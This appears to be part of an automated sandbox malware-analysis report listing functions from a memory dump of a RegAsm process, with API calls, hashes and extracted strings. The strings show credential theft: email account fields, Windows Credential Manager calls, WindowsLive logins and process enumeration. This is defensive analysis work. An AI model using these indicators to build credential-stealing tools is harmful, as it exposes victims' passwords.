                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                                                      Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$strlen
                                                                                                                                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                      • API String ID: 2619041689-3408036318
                                                                                                                                                                                                                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                                                      Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$strlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 667451143-3916222277
                                                                                                                                                                                                                      • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                                                      • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                                                      Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                      • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                      • API String ID: 893589435-260894208
                                                                                                                                                                                                                      • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                                                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                                                      Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                      • API String ID: 2881943006-572158859
                                                                                                                                                                                                                      • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                                                      • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                                                                                                      Function 00410034 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 48libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad
                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                      • API String ID: 534179979-232097475
                                                                                                                                                                                                                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                                                      Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                      • API String ID: 888011440-2039793938
                                                                                                                                                                                                                      • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                                                      Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                                                      • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                                                      • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                                                      • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                      • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                      • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                                                      Function 00409C1C Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                                      • String ID: 0wE$d
                                                                                                                                                                                                                      • API String ID: 2915808112-1552800882
                                                                                                                                                                                                                      • Opcode ID: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                                                      • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                                                                                                      Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                      • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                                                      Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                                                      Function 00405E69 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                                                                                                      • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                                                                                        • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                                                                                        • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2432066023-0
                                                                                                                                                                                                                      • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                                                      • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                                                                                                                                                      Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                                                      • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                      • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                      • API String ID: 945165440-3589380929
                                                                                                                                                                                                                      • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                      • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                                                      Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                      • API String ID: 3411445237-4169760276
                                                                                                                                                                                                                      • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                                                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                                                      Function 0040FFB0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 44COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 4139908857-3953557276
                                                                                                                                                                                                                      • Opcode ID: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                                                      • Instruction ID: ef187524dc85a124578c70d9a5034bc1ef4a482c247f5fceb27d5c4ea416582d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15F06D30A007566AA7234B297C91BAB2EB89B4DB81715003BA400E6251DBE8D8C1CA6D
                                                                                                                                                                                                                      Function 004045DB Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad
                                                                                                                                                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                      • API String ID: 534179979-4258758744
                                                                                                                                                                                                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
